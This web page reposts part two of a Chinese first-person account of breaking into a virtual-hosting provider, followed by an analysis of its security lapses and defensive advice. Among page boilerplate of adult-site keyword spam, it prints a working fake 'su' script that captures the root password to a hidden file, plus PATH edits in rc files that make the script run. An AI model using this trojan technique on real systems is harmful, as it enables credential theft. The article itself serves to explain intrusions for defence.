国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区

掃一掃
關(guān)注微信公眾號

入侵實例看虛擬主機(jī)系統(tǒng)的安全問題(下)
2007-02-25   

由一次入侵實例看虛擬主機(jī)系統(tǒng)的安全問題(下)

作者: 更新日期:2004-10-31 類別:網(wǎng)絡(luò)安全->安全防御 總瀏覽/今日:332/1

雖然到目前為止,我事實上已經(jīng)控制了他所有的UNIX主機(jī),也早就有了root權(quán)限,但root的密碼我還是不知道,這多少還有點不甘心,怎樣來得到這個密碼呢?窮舉當(dāng)然是一種,但我就算知道了root密碼,也不想要干什么,何必費這么大的勁,所以我決定來一招偷天換日,雖然sysadm很少會從telnet登錄,但他總要有登陸的時候的,而且一登陸肯定要干root才干的事,他必須使用su命令讓自己成為root,使用su命令的時候當(dāng)然需要輸入root的密碼,我就可從這點入手,做一個假的su來欺騙,讓他先運行的是我寫的su,把他輸入的密碼保存到一個文件上,即使他的密碼是對的,也給他出錯提示,然后刪除我的這個su,他再次運行的就是真正的su了。所以我用sysadm登錄并寫了如下腳本放在他的用戶目錄下,文件名為su

%vi su

#!/bin/sh

echo -n "Password:"

stty -echo;read PASSWD;stty echo

echo "$PASSWD">>/tmp/.password

echo;

echo "Sorry"

rm -fr ~/su

:wq

%chmod 755 su

為了讓他先運行的是我的su而不是系統(tǒng)的su,還需要改變shell的rc文件,所以打開.cshrc 在

set path = (/sbin /bin /usr/sbin /usr/bin /usr/local/sbin /usr/local/bin $HOME/bin)前面增加一個~,

即讓系統(tǒng)在查找命令時首先查找的是自己的目錄,就是放有我寫的su的目錄,變成這個樣子

set path = (~ /sbin /bin /usr/sbin /usr/bin /usr/local/sbin /usr/local/bin $HOME/bin)

因為不知道他會使用那個shell,所以每一個rc文件都做了同樣的處理......

最后的結(jié)果當(dāng)然是順利的取得了root的密碼,雖然這個方法看起來很簡陋,容易看穿,但事實上卻是非常的隱蔽,在一個UNIX系統(tǒng)上,輸入密碼是連個*都沒有給你回顯的,管理員去su的時候,一般都是有事,需要很快做好,輸錯一次密碼應(yīng)該還沒感覺過來,就算之后感覺出來了但我這個su又是運行一次就刪掉了,不像什么木馬后門之類,做完事還大摸大樣的留在那里,而rc文件,一般設(shè)置完成之后都很少有去看的,大不了我得到密碼之后改回來就是了,基本上并沒有留下什么痕跡。

實際上,這個入侵的實例,由頭到尾都是極為普通的,沒有什么高技術(shù)的成分,也沒有現(xiàn)在人家都喜歡用的什么什么漏洞,什么什么溢出,只是由一個普通用戶的弱口令開始,慢慢的發(fā)展到了整個主機(jī)群被控于一個入侵者的手中,事實上,操作系統(tǒng)和各種相關(guān)服務(wù)的本身并沒有什么漏洞,問題主要還是發(fā)生在CGI程序的編寫,維護(hù)中的疏忽,管理員對安全問題不敏感這些上。在系統(tǒng)本身的漏洞少這點上,應(yīng)該可以看出,主機(jī)一開始是由一些資深的工程師配置,之后也會根據(jù)以發(fā)現(xiàn)的漏洞做修補(bǔ),但在以后的管理過程中,是由下一層技術(shù)人員負(fù)責(zé),這一層的人往往技術(shù)面不廣,人家叫干什么就干什么,不會有很大的責(zé)任壓力,這樣就把安全問題越捅越大。如果沒有那個備份文件,我根本不能了解那個以root運行的apache的cgi-bin的目錄結(jié)構(gòu)和具體的文件名,因為其他人并沒有r權(quán)限。第二個就是suid為root的程序的寫法不夠嚴(yán)格(以root運行的apache執(zhí)行CGI時和suid root是差不多一樣的),在一個虛擬主機(jī)上,為了讓用戶可以通過web界面來管理,不得不讓apache以root的身份運行,因為用戶的設(shè)置,需要改變很多系統(tǒng)的配置文件,如passwd httpd.conf sendmail.cf 等等,雖然apache的suexe提供了比squid更多安全選項如docroot等,但在這里根本就派不上用場。所以這個CGI應(yīng)該是每一行代碼都要知道自己是以root運行的,絲毫不得有差錯,但遺憾的是,我見到的大多數(shù)服務(wù)商的這種CGI都忘記了自己是誰,其寫法和普通的CGI類似,創(chuàng)建的文件大多是設(shè)置為666,777,而程序本身的屬性為755,事實上,當(dāng)apache加入suexec這個功能后,CGI程序本身設(shè)置為700,其他文件為400就可以了,可以做到除了自己,任何人不可以讀。如果沒有這個屬性的問題,在上面的實例中,我也不可能在cgi-bin下面創(chuàng)建文件,讓apache去運行,也就無法改變主業(yè),復(fù)制文件,修改程序。正是這一步,把整個系統(tǒng)推向了被毀滅的邊緣。第三個問題就老生常談了,人本身的安全意識問題,在幾個服務(wù)商的主機(jī)上都發(fā)現(xiàn)了,同一個服務(wù)商,它的結(jié)構(gòu)一樣的不同的主機(jī),某些目錄的權(quán)限也不一樣,這個很明顯是在日常的維護(hù)中改變的。在維護(hù)過程中,對一些微妙的東西不注意,往往也是危險發(fā)生的原因,比如那個su,就這樣讓我把root密碼給偷了去。而上面提及的問題,到頭來也是體現(xiàn)在這個問題上,安全似乎沒有大小之分,一個大的遠(yuǎn)程溢出可以讓入侵者得到root,但只是一些小小疏忽也可以讓入侵者得到root,但大家往往都把注意力集中在一些系統(tǒng)漏洞的修補(bǔ)上,卻忽視了某些"小問題"。

在目前的技術(shù)水平上實現(xiàn)的虛擬主機(jī),這些問題的出現(xiàn)應(yīng)該說是在所難免的,因為這涉及到了服務(wù)商的整個員工隊伍的素質(zhì)問題,在沒有更好的虛擬主機(jī)的實現(xiàn)方法之前,如果從技術(shù)方面考慮,我覺得應(yīng)該在權(quán)限方面多下功夫,比如用程序隔一定時間(如一小時)檢查各個重要的目錄、文件是否有被修改,用編譯的程序來代替腳本類型的程序等等,說下去又一長篇大論,本人知識水平有限,為了避免在各位高人面前班門弄斧,就此打住。


熱詞搜索:

上一篇:系統(tǒng)安全知識之系統(tǒng)安全的最小特權(quán)原則
下一篇:入侵實例看虛擬主機(jī)系統(tǒng)的安全問題(上)

分享到: 收藏
国产一级一区二区_segui88久久综合9999_97久久夜色精品国产_欧美色网一区二区
欧美午夜影院一区| 亚洲欧美另类小说| 亚洲乱码中文字幕| 美女视频免费一区| 色综合久久九月婷婷色综合| 欧美大片一区二区三区| 夜色激情一区二区| 懂色一区二区三区免费观看| 欧美乱妇20p| 亚洲丝袜自拍清纯另类| 国产米奇在线777精品观看| 欧美色区777第一页| 中文字幕制服丝袜成人av| 久久99精品久久久久久久久久久久 | 亚洲一二三专区| 国产高清成人在线| 精品久久国产97色综合| 亚洲第一主播视频| 色香色香欲天天天影视综合网| 国产拍揄自揄精品视频麻豆| 九九九久久久精品| 日韩一区二区高清| 视频一区视频二区中文字幕| 欧美日韩亚洲不卡| 亚洲风情在线资源站| 色婷婷av一区二区三区gif| 国产精品九色蝌蚪自拍| 成人性生交大片免费看中文| 2021中文字幕一区亚洲| 男男gaygay亚洲| 欧美一级一区二区| 免费一级欧美片在线观看| 欧美一区二区三区四区久久| 三级在线观看一区二区| 欧美麻豆精品久久久久久| 亚洲成人三级小说| 欧美另类videos死尸| 日本vs亚洲vs韩国一区三区二区| 欧美亚洲动漫另类| 亚洲3atv精品一区二区三区| 欧美日韩大陆在线| 秋霞电影一区二区| 久久久久久久网| 成人精品在线视频观看| 椎名由奈av一区二区三区| 色婷婷激情久久| 亚洲.国产.中文慕字在线| 91精品综合久久久久久| 美女精品一区二区| 久久品道一品道久久精品| 国产精品综合一区二区| 中文成人av在线| 在线观看日韩电影| 六月丁香婷婷色狠狠久久| 国产欧美日韩在线视频| 色综合久久久久久久久| 免费久久精品视频| 国产婷婷色一区二区三区在线| www.亚洲精品| 香蕉久久夜色精品国产使用方法| 欧美一级二级在线观看| 成人免费毛片a| 伊人色综合久久天天| 欧美一区二区三区在线视频| 国产一区二区三区在线观看免费视频| 亚洲国产精品99久久久久久久久| 在线观看网站黄不卡| 精品一区二区三区在线观看国产 | 国产精品乱子久久久久| 欧美日韩国产另类一区| 国产成人免费xxxxxxxx| 一区二区三区四区五区视频在线观看| 91精品麻豆日日躁夜夜躁| 国产乱码精品一品二品| 亚洲一区二区视频在线| 久久久亚洲精品一区二区三区| 91久久国产最好的精华液| 久久电影网站中文字幕| 中文字幕字幕中文在线中不卡视频| 日韩视频一区二区三区在线播放 | 日韩久久一区二区| 欧美v日韩v国产v| 欧美性大战久久| 国产成人一区二区精品非洲| 亚洲成a人v欧美综合天堂| 国产欧美精品国产国产专区| 91精品国产色综合久久不卡电影 | 欧美一级理论片| 日本高清不卡aⅴ免费网站| 精品一区二区三区在线播放视频 | 一区二区中文视频| 一区二区三区四区蜜桃| 国产欧美一区二区精品性色超碰| 欧美日韩激情一区二区三区| 99久久精品国产一区二区三区 | 视频一区二区欧美| 中文字幕欧美一区| 久久久久久久综合日本| 欧美xxxx老人做受| 欧美老女人第四色| 欧美性受xxxx黑人xyx性爽| 成人h动漫精品一区二区| 国产精品综合一区二区三区| 青青草97国产精品免费观看| 亚洲成人精品在线观看| 亚洲狠狠爱一区二区三区| 亚洲欧美日韩在线不卡| 国产精品亲子伦对白| 国产日产精品一区| 久久先锋影音av| 久久久久久久综合| 国产日韩精品视频一区| 国产欧美1区2区3区| 国产亚洲一本大道中文在线| 欧美不卡在线视频| 精品精品欲导航| 日韩欧美不卡一区| 欧美xxxxxxxx| 久久久亚洲综合| 国产欧美一区二区精品秋霞影院| 中文字幕第一区| 国产免费久久精品| 国产精品久久国产精麻豆99网站 | 91精品国产综合久久久久久久| 制服丝袜亚洲网站| 欧美一级艳片视频免费观看| 欧美成人一区二区三区片免费| 欧美xxxxxxxx| 中文字幕 久热精品 视频在线| 国产精品久久久久久久久晋中| 国产精品美女久久久久久久网站| 国产精品久久久久影视| 亚洲欧美日韩精品久久久久| 一区二区三区在线观看动漫| 午夜激情一区二区| 六月丁香综合在线视频| 成人午夜视频福利| 色综合天天综合网国产成人综合天| 色猫猫国产区一区二在线视频| 欧美日韩久久不卡| 精品国产一区二区精华| 国产精品美女一区二区三区 | gogo大胆日本视频一区| 国产精品天美传媒沈樵| 亚洲日本在线视频观看| 午夜精品久久一牛影视| 人人超碰91尤物精品国产| 国产suv精品一区二区三区| 色欧美片视频在线观看在线视频| 欧美精品一级二级三级| 精品福利av导航| 国产精品五月天| 亚洲一区二区成人在线观看| 国模少妇一区二区三区| av在线不卡观看免费观看| 欧美一二三区精品| **欧美大码日韩| 精品一区二区三区视频在线观看| 99视频一区二区| 欧美不卡一区二区三区四区| 最新成人av在线| 激情成人综合网| 91久久精品午夜一区二区| 久久精品欧美日韩| 五月激情六月综合| 不卡的看片网站| 日韩精品影音先锋| 亚洲电影你懂得| 91影院在线观看| 国产亚洲1区2区3区| 三级久久三级久久| 91国内精品野花午夜精品| 久久亚区不卡日本| 蜜臀久久久99精品久久久久久| 91麻豆精品在线观看| 亚洲精品一区二区三区蜜桃下载| 一卡二卡欧美日韩| fc2成人免费人成在线观看播放| 日韩午夜激情电影| 亚洲狠狠爱一区二区三区| 成人三级伦理片| 国产欧美精品国产国产专区| 韩国毛片一区二区三区| 日韩欧美123| 石原莉奈一区二区三区在线观看 | 成人综合婷婷国产精品久久| 欧美一激情一区二区三区| 亚洲一二三四久久| 色又黄又爽网站www久久| 国产精品少妇自拍| 国产风韵犹存在线视精品| 日韩精品一区二区三区四区| 天堂午夜影视日韩欧美一区二区| 91国在线观看| 一区二区三区国产豹纹内裤在线| jlzzjlzz亚洲日本少妇| 成人av网在线| 看电视剧不卡顿的网站| 精品一区二区三区日韩| 99精品国产一区二区三区不卡|